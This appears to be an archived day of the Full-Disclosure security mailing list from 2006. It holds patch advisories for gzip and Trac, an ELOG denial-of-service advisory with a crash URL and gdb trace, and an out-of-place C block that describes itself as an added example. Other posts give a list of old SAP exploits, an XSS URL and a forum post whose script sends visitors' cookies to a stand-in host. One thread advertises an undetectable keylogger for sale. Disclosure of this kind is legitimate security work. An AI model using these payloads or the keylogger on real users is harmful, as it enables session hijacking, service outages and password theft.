[Full-disclosure] [FLSA-2006:211760] Updated gzip package fixes security issues

2006-11-12 Thread David Eisenstein

-
   Fedora Legacy Update Advisory

Synopsis:  Updated gzip package fixes security issues
Advisory ID:   FLSA:211760
Issue date:2006-11-13
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2006-4334, CVE-2006-4338, CVE-2006-4335,
   CVE-2006-4336, CVE-2006-4337
-


-
1. Topic:

An updated gzip package is now available.

The gzip package contains the GNU gzip data compression program.

2. Relevant releases/architectures:

Fedora Core 3 - i386, x86_64
Fedora Core 4 - i386, x86_64

3. Problem description:

Tavis Ormandy of the Google Security Team discovered two denial of service
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to hang or
crash. (CVE-2006-4334, CVE-2006-4338)

Tavis Ormandy of the Google Security Team discovered several code execution
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to crash or
execute arbitrary code. (CVE-2006-4335, CVE-2006-4336, CVE-2006-4337)

Users of gzip should upgrade to this updated package, which contains a
backported patch and is not vulnerable to these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=211760

6. RPMs required:

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/gzip-1.3.3-16.1.fc3.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/gzip-1.3.3-16.1.fc3.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gzip-1.3.3-16.1.fc3.legacy.x86_64.rpm

Fedora Core 4:

SRPM:
http://download.fedoralegacy.org/fedora/4/updates/SRPMS/gzip-1.3.5-6.1.0.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/4/updates/i386/gzip-1.3.5-6.1.0.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/4/updates/x86_64/gzip-1.3.5-6.1.0.legacy.x86_64.rpm

7. Verification:

SHA1 sum Package Name
-

fc3:
803cef0b8d4e06f79ae9ce64aee63cdd761e87b6  fedora/3/updates/i386/gzip-1.3.3-16.1.fc3.legacy.i386.rpm
602ad6828a3388063db0c45f13c256d92b12cc51  fedora/3/updates/x86_64/gzip-1.3.3-16.1.fc3.legacy.x86_64.rpm
7f4737f9e627480ee211022b9dffc1da5696adda  fedora/3/updates/SRPMS/gzip-1.3.3-16.1.fc3.legacy.src.rpm

fc4:
1cf4530543c8f7da0d331f11388bb7517fa013e4  fedora/4/updates/i386/gzip-1.3.5-6.1.0.legacy.i386.rpm
17fb012aacf13fcf623c5f6447d4ba127ed4a780  fedora/4/updates/x86_64/gzip-1.3.5-6.1.0.legacy.x86_64.rpm
b49360a81b5d4df62dbbb3b2b094515678f41a35  fedora/4/updates/SRPMS/gzip-1.3.5-6.1.0.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v 

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum 

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4335
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4337

9. Contact:

The Fedora Legacy security contact is <[EMAIL PROTECTED]>. More
project details at http://www.fedoralegacy.org

-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ELOG Web Logbook Remote Denial of Service Vulnerability

2006-11-12 Thread OS2A BTO

Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.
(http://midas.psi.ch/elog/index.html)

Attached is the advisory which details the vulnerability.

Thanks,
OS2A
ELOG Web Logbook Remote Denial of Service Vulnerability


OS2A ID: OS2A_1008  Status:
10/31/2006  Issue Discovered
11/08/2006  Reported to the Vendor
11/08/2006  Fixed by Vendor
11/10/2006  Advisory Released


Class: Denial of Service
Severity: Medium


Overview:
-
The Electronic Logbook (ELOG) is part of a family of applications known as
weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of
use and versatility.
http://midas.psi.ch/elog/index.html

Description:

Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.

The [global] section in the configuration file elogd.cfg is used for settings
common to all logbooks. The vulnerability is due to improper handling of an
HTTP GET request if the logbook name 'global' (or any logbook name prefixed
with global) is used in the request. When such a request is received,
a NULL pointer dereference occurs, leading to a crash of the service.

Only authenticated users can exploit this vulnerability if the application
is configured with a password.

Impact:
---
Successful exploitation allows a remote attacker to crash the elogd server.

Affected Software(s):
-
ELOG 2.6.2 (SVN revision 1748) and prior. 
Debian package elog 2.6.2+r1719-1 and prior are also vulnerable.

Proof of Concept:
-
The HTTP GET request given below is sufficient to crash an affected server:
http://www.example.com/global/
or
Create a logbook [global_xxx] or [global xxx] in elogd.cfg
and try to access it using a browser.
http://www.example.com/global_xxx/
http://www.example.com/global%20xxx/

Analysis:
---
# gdb ./elogd
...
...

(gdb) break show_elog_list
Breakpoint 2 at 0x809d6e0

(gdb) c
Continuing.
(no debugging symbols found)
elogd 2.6.2 built Nov  8 2006, 01:25:48 revision 1699
Falling back to default group "elog"
Falling back to default user "elog"
Indexing logbooks ... done
Server listening on port 8080 ...

Breakpoint 2, 0x0809d6e0 in show_elog_list ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0809eb7a in show_elog_list ()

(gdb) bt
#0  0x0809eb7a in show_elog_list ()
#1  0x in ?? ()

(gdb) i r
eax            0x0         0
ecx            0x9d43d88   164904328
edx            0x0         0
ebx            0x0         0
esp            0xbfa8aca0  0xbfa8aca0
ebp            0x80df40c   0x80df40c
esi            0xbfb27050  -1078824880
edi            0x0         0
eip            0x809eb7a   0x809eb7a
eflags         0x200246    2097734
cs             0x73        115
ss             0x7b        123
ds             0x7b        123
es             0x7b        123
fs             0x0         0
gs             0x33        51

(gdb) x/i $eip
0x809eb7a:     mov    (%eax),%eax

The vulnerable code is at Line:16774 of elogd.c, 
n_msg = *lbs->n_el_index;
where the pointer lbs is dereferenced before being null checked.

--- elogd.c, show_elog_list() ---

   } else {
      n_logbook = 1;
      n_msg = *lbs->n_el_index;
   }

   msg_list = xmalloc(sizeof(MSG_LIST) * n_msg);

--- elogd.c, show_elog_list() ---


CVSS Score Report:
-
ACCESS_VECTOR  = REMOTE
ACCESS_COMPLEXITY  = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT   = NONE
AVAILABILITY_IMPACT= COMPLETE
IMPACT_BIAS= AVAILABILITY
EXPLOITABILITY = FUNCTIONAL
REMEDIATION_LEVEL  = OFFICIAL_FIX
REPORT_CONFIDENCE  = CONFIRMED
CVSS Base Score= 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A)
CVSS Temporal Score= 4.1
Risk factor= Medium



Vendor Response:
---
Vendor has acknowledged the vulnerability and released a fixed version,
ELOG version 2.6.2-7 (SVN revision 1749).
http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=0&sc=0&isdir=1
(Revisions 1746-1749)

Debian has fixed this issue in elog_2.6.2+r1754-1,
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875

Solution:
-
Install the fixed version,
ELOG version 2.6.2-7 (SVN revision 1749) or later.
http://midas.psi.ch/elog/download.html

For debian, update to elog_2.6.2+r1754-1 or later.


Credits:
---
Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery and
analysis of this vulnerability.
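
The check that the show_elog_list() excerpt lacks, as an added example that is neither OS2A's advisory code nor ELOG's: a constructed model of the logbook lookup (LOGBOOK, find_logbook, handle_list_request and the sample section table are assumptions, as is the rule that "global"-prefixed names never resolve to a logbook) with the unchecked dereference beside its hardened form.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the crash described in the advisory, not elogd's
 * code. n_el_index points at the entry count, as in the excerpt's
 * "n_msg = *lbs->n_el_index". */
typedef struct {
    const char *name;
    int *n_el_index;
} LOGBOOK;

/* Constructed stand-in for the logbooks indexed from elogd.cfg. */
static int entry_counts[] = { 12, 3, 0 };
static LOGBOOK logbooks[] = {
    { "demo",       &entry_counts[0] },
    { "physics",    &entry_counts[1] },
    { "global_xxx", &entry_counts[2] },   /* section from the PoC */
};
#define N_LOGBOOKS (sizeof(logbooks) / sizeof(logbooks[0]))

/* Resolve the logbook name taken from the request path.
 * Assumption of this model: section names starting with "global" belong
 * to the shared settings section and never resolve to a logbook, so the
 * PoC's /global/, /global_xxx/ and /global xxx/ all yield NULL here. */
LOGBOOK *find_logbook(const char *name)
{
    size_t i;
    if (name == NULL || strncmp(name, "global", 6) == 0)
        return NULL;
    for (i = 0; i < N_LOGBOOKS; i++)
        if (strcmp(logbooks[i].name, name) == 0)
            return &logbooks[i];
    return NULL;
}

/* Shape of the vulnerable line: lbs is dereferenced before any NULL check,
 * so a NULL lbs reads through address 0 and the server takes SIGSEGV
 * (consistent with eax == 0 at the faulting mov in the gdb dump). */
int count_messages_unchecked(LOGBOOK *lbs)
{
    return *lbs->n_el_index;           /* crashes when lbs == NULL */
}

/* Hardened form: check the pointer first and report -1 instead of
 * dereferencing an invalid logbook. */
int count_messages_checked(LOGBOOK *lbs)
{
    if (lbs == NULL || lbs->n_el_index == NULL)
        return -1;
    return *lbs->n_el_index;
}

/* How the list handler should behave: resolve the name, refuse the request
 * with an HTTP-style status when it names no real logbook, and only then
 * size the message list. Returns the status code. */
int handle_list_request(const char *logbook_name)
{
    int n_msg = count_messages_checked(find_logbook(logbook_name));
    if (n_msg < 0)
        return 404;                    /* no such logbook: stop before xmalloc */
    /* msg_list = xmalloc(sizeof(MSG_LIST) * n_msg) would follow here */
    return 200;
}

int main(void)
{
    const char *paths[] = { "demo", "global", "global_xxx", "global xxx" };
    size_t i;
    for (i = 0; i < sizeof(paths) / sizeof(paths[0]); i++)
        printf("GET /%s/ -> %d\n", paths[i], handle_list_request(paths[i]));
    return 0;
}
```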


Re: [Full-disclosure] retiring from public security stuff

2006-11-12 Thread Dude VanWinkle
On 11/12/06, Georgi Guninski <[EMAIL PROTECTED]> wrote:
> fyi:
>
> retiring from public security stuff. public flaming is not clear atm.
> obviously this may change without notice.
> this does not mean selling out.


No worries mate, you deserve a break.

Thanks for your contributions to the infosec community and helping to
keep the Internet useful for something other than phishing sites and
spam.

Asta La Pasta Georgi, you will be missed!

-JP



Re: [Full-disclosure] Keylogger

2006-11-12 Thread nexttuesday
I wonder how many suckers will send this guy some money.

It is not hard to write something to hook the keyboard driver that 
is not detected by AV.  It is not hard to write something that logs 
and then sends emails either.

The hard part is getting it on the system and having it stay 
undetected.

So I am proud to announce that for the small, one time only price 
of three equal payments of $99.95 I can offer remote exploits that 
can allow you to install this keylogger on systems without being 
detected. 

Act now and I will throw in for free source code valued at $29.95.  
Only the first 5 customers qualify for this incredible never seen 
before offer.

See you,
NT





Re: [Full-disclosure] Keylogger

2006-11-12 Thread Matthew Flaschen
This seems like a rip-off.  How is it making itself startup?  Most of
the usual means are tracked by various programs (such as Spybot S&D).
Since it uses ordinary email, the recipient's ISP or company could
easily notice (especially with the convenient hourly pattern).  Also,
why would you display error messages? This only attracts the user's
attention to the computer, and makes it likely that they'll call in tech
support.

Matthew Flaschen

0 0 wrote:
> Yesterday I finished programming a keylogger, and have decided to sell it
> online for a small price.  I have posted here because I believe people
> would
> be interested in a hacking tool such as this - keyloggers are the easiest
> and quickest way to obtain an email password.  Here are its features:
> 
> -> Undetectable by ALL antivirus products in use today.
> -> Remains on victim's computer permanently (adds to startup).
> -> Bypasses Windows Firewall.
> -> Sends logs via email to your chosen email account.
> -> Logs include computer information, current window name, and of course
> logged keystrokes.
> -> Logs are sent hourly.
> -> Displays fake error message to user.
> 
> My pricing plans are:
> 
> -> $11 = Keylogger.
> -> $16 = Keylogger + Source code.
> -> +$5 to either for access to all future updates.
> 
> I only accept paypal/credit card.
> 
> Buying this product is simple - simply fill in the template below and email
> it to me at the below address (replace [at] with @):
> 
> richard.williams140 [at] googlemail.com
> 
> =
> 
> To: (me)
> Subject: Keylogger Purchase
> 
> My chosen purchase: (enter what you wish to buy here)
> Send logs to: (your chosen email here)
> 
> (enter any notes on the purchase here)
> 
> =
> 
> After receiving your email, I will enter your details into the keylogger
> and
> compile it new for you.  Upon finishing this, I will email you back and let
> you know where you need to send the paypal money to (or pay via credit
> card).  After receiving your money, I will send the keylogger and
> instructions to you by email.
> 
> After receiving the program, it really is as simple as sending it to
> someone, telling them to run it, and watching the logs appear in your email
> account!
> 
> 
> 
> 





Re: [Full-disclosure] retiring from public security stuff

2006-11-12 Thread nexttuesday
*yawn*

http://michaeldaw.org/news/news-121106-0/

even bigger *YAWN*

Nobel Prize?  A nobel prize should go to someone who actually does 
some good and improves the state of security.

Good riddance.

See you,
NT.









Re: [Full-disclosure] Keylogger

2006-11-12 Thread Karl Ordnung
i think i order 10 pieces,

what next to do ?

0 0 wrote:
> Yesterday I finished programming a keylogger, and have
> decided to sell it online for a small price.  I have posted here
> because I believe people would be interested in a hacking tool such as
> this - keyloggers are the easiest and quickest way to obtain an email
> password.  Here are its features:
>
> -> Undetectable by ALL antivirus products in use today.
> -> Remains on victim's computer permanently (adds to startup).
> -> Bypasses Windows Firewall.
> -> Sends logs via email to your chosen email account.
> -> Logs include computer information, current window name, and of
> course logged keystrokes.
> -> Logs are sent hourly.
> -> Displays fake error message to user.
>
> My pricing plans are:
>
> -> $11 = Keylogger.
> -> $16 = Keylogger + Source code.
> -> +$5 to either for access to all future updates.
>
> I only accept paypal/credit card.
>
> Buying this product is simple - simply fill in the template below and
> email it to me at the below address (replace [at] with @):
>
> richard.williams140 [at] googlemail.com
>
> =
>
> To: (me)
> Subject: Keylogger Purchase
>
> My chosen purchase: (enter what you wish to buy here)
> Send logs to: (your chosen email here)
>
> (enter any notes on the purchase here)
>
> =
>
> After receiving your email, I will enter your details into the
> keylogger and compile it new for you.  Upon finishing this, I will
> email you back and let you know where you need to send the paypal money
> to (or pay via credit card).  After receiving your money, I will send
> the keylogger and instructions to you by email.
>
> After receiving the program, it really is as simple as sending it to
> someone, telling them to run it, and watching the logs appear in your
> email account!

[Full-disclosure] Keylogger

2006-11-12 Thread 0 0
Yesterday I finished programming a keylogger, and have decided to sell it
online for a small price.  I have posted here because I believe people
would be interested in a hacking tool such as this - keyloggers are the
easiest and quickest way to obtain an email password.  Here are its features:

-> Undetectable by ALL antivirus products in use today.
-> Remains on victim's computer permanently (adds to startup).
-> Bypasses Windows Firewall.
-> Sends logs via email to your chosen email account.
-> Logs include computer information, current window name, and of course
logged keystrokes.
-> Logs are sent hourly.
-> Displays fake error message to user.

My pricing plans are:

-> $11 = Keylogger.
-> $16 = Keylogger + Source code.
-> +$5 to either for access to all future updates.

I only accept paypal/credit card.

Buying this product is simple - simply fill in the template below and email
it to me at the below address (replace [at] with @):

richard.williams140 [at] googlemail.com

=

To: (me)
Subject: Keylogger Purchase

My chosen purchase: (enter what you wish to buy here)
Send logs to: (your chosen email here)

(enter any notes on the purchase here)

=

After receiving your email, I will enter your details into the keylogger and
compile it new for you.  Upon finishing this, I will email you back and let
you know where you need to send the paypal money to (or pay via credit
card).  After receiving your money, I will send the keylogger and
instructions to you by email.

After receiving the program, it really is as simple as sending it to
someone, telling them to run it, and watching the logs appear in your email
account!

[Full-disclosure] [SECURITY] [DSA 1209-1] New trac packages fix cross-site request forgery

2006-11-12 Thread Moritz Muehlenhoff

--------------------------------------------------------------------------
Debian Security Advisory DSA 1209-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
November 12th, 2006                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: trac
Vulnerability  : cross-site request forgery
Problem-Type   : remote
Debian-specific: no

It was discovered that Trac, a wiki and issue tracking system for
software development projects, performs insufficient validation against
cross-site request forgery, which might lead to an attacker being able
to perform manipulation of a Trac site with the privileges of the
attacked Trac user.

For the stable distribution (sarge) this problem has been fixed in
version 0.8.1-3sarge6.

For the unstable distribution (sid) this problem has been fixed in
version 0.10.1-1.

We recommend that you upgrade your trac package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:

http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6.dsc
  Size/MD5 checksum:  656 9aee65c62e905729214dc065e0dd85a5

http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6.diff.gz
  Size/MD5 checksum:14618 7de0360d7a6cd04c7cb535b69b6d296b
http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1.orig.tar.gz
  Size/MD5 checksum:   236791 1b6c44fae90c760074762b73cdc88c8d

  Architecture independent components:


http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6_all.deb
  Size/MD5 checksum:   199920 dd5e78a6212c457d72729a17e5810b25

  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/


Re: [Full-disclosure] 18th anniversary of Internet worm a.k.a. Morris worm

2006-11-12 Thread Valdis . Kletnieks
On Sun, 12 Nov 2006 18:21:16 GMT, "Dave \"No, not that one\" Korn" said:
> Georgi Guninski wrote:
> > my question was:
> >
> > when was the first provable *public* (as in common sense)
> > announcement of the exploitability of buffer overflows.
> 
>   The use of smashing the stack to seize control of the program flow was in 
> everyday usage on the Commodore PET from around 1979-1980ish.  It was our 
> standard technique for making programs autorun after loading!

Was that a "classic" smash-the-stack, where an overly long parameter is used
to over-write the return pointer, or were you guys just intercepting the
return pointer directly?  If the latter, I'm pretty sure there was software
that would overlay return pointers in order to redirect program flow as far
back as IBM's OS/360 in the 1967-75 timeframe.



Re: [Full-disclosure] retiring from public security stuff

2006-11-12 Thread David Kierznowski
http://michaeldaw.org/news/news-121106-0/



[Full-disclosure] Old SAP exploits

2006-11-12 Thread Nicob

For historical purposes only (everything should compile/run fine). A
TGZ archive is attached to this email, and a mirror is available on my
website : http://nicob.net/mirrors/sap_sploits.tgz

o testing users and passwords with RfcOpenEx (account locking bypass) :

- allow networked attack on SAP passwords
- now deprecated in favor of THC Hydra
- need the RFC SDK to compile
- port : TCP/3300+SYSNR
- exploit : sapchk.c

o customized RFC_SYSTEM_INFO (information disclosure) :

- will leak OS type, SAP version, real IP address, ...
- need the RFC SDK to compile
- port : TCP/3300+SYSNR
- exploit : sap-banner.c

o original Win32 gwrd bug by FX (remote command execution) :

- patched in 4.6D patch 1767 and 6.40 patch 4
- partial control on a CreateProcess() call
- can be used for "cmd /c ..." evil
- port : UDP/3300+SYSNR
- exploit : r3mote_win_UDPexec.pl

o linux port of the gwrd bug (remote command execution) :

- patched in 4.6D patch 1767 and 6.40 patch 4
- partial control on a execve() call
- each argument but the first must be max 8 characters long
- exploitable remotely under some conditions
- port : UDP/3300+SYSNR
- exploit : r3mote_unix_UDPexec.pl and r3mote_unix_wrapper.sh

o two bytes UDP crash in enserver.exe (remote DoS) :

- patched in 6.40 patch 6
- port : UDP/64999
- exploit : SAP_WebAS_UDP_DoS.c
- no, that's not related to the DoS published earlier this month

With many thanks to [EMAIL PROTECTED], the OaiTeam, FX from Phenoelit and
all the valuable Darklab members.

Nicob



[Full-disclosure] XSS in roundcube.com and users of it

2006-11-12 Thread RSnake
There is an XSS vulnerability in roundcube webmail:

http://demo.roundcube.net/?_task=');alert(%22XSS%22)//

Btw, we've been posting 0-day XSS vulnerabilities at 
http://sla.ckers.org/forum/list.php?3 to take it out of the full 
disclosure list since lots of people don't want to see the sheer volume 
of reports.  We've got close to a thousand companies and counting.  
We're just trying to cut down on the noise to people's inboxes.  That is 
all.

-RSnake
http://ha.ckers.org
http://sla.ckers.org



[Full-disclosure] sun and their pathetic forum management (xss, etc)

2006-11-12 Thread auto158202
Sun, in their amazing patheticness, have again allowed direct HTML 
to be written into their forum system.

URL: http://forum.java.sun.com/forum.jspa?forumID=553

It works on only select forums, but due to severe incompetence from 
the administrators of the site, this issue will occur quite often. 
It is worth your while to test out any forum you like, you may just 
see it working.


EXPLOIT (hah):
==
start a new thread or post a reply and include any HTML you like, 
preferably to steal a cookie or trick users into logging in again 
but submit to your server; your imagination is the only restriction.


EXAMPLE:
==
Message:
Hello. 

window.attachEvent("onload", foo);
function foo() {
  xxa.src = "http://www.example.com/steal/?"; + document.cookie;
}



FIX:
==
Sun needs to accept that their administration of the site is 
absolutely terrible and do something about it. The Jive software 
that runs the forum is completely fine, it is Sun's mismanagement 
that causes these issues. Jive should not be subject to the very 
bad image the forum software gets from its use on Sun's site.

Thanks.





Re: [Full-disclosure] 18th anniversary of Internet worm a.k.a. Morris worm

2006-11-12 Thread Dave \"No, not that one\" Korn
Georgi Guninski wrote:
> my question was:
>
> when was the first provable *public* (as in common sense)
> announcement of the exploitability of buffer overflows.

  The use of smashing the stack to seize control of the program flow was in 
everyday usage on the Commodore PET from around 1979-1980ish.  It was our 
standard technique for making programs autorun after loading!

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





[Full-disclosure] retiring from public security stuff

2006-11-12 Thread Georgi Guninski
fyi:

retiring from public security stuff. public flaming is not clear atm.
obviously this may change without notice.
this does not mean selling out.

if one needs to ask for a reason: got old, got somewhat tired.

since kids often ask `how to hack', here is some unsupported advice
without warranty of any kind:

*) there is no magic wand solution
*) be careful, anonymous and paranoid
*) patience greatly helps
*) in a lot of cases people don't succeed just because they don't try -
as in this quote
"It is well known that a vital ingredient of success is not knowing 
that what you're attempting can't be done." -- Terry Pratchett
*) fame is worthless

bye bye and all the best :)

-- 
georgi
EOM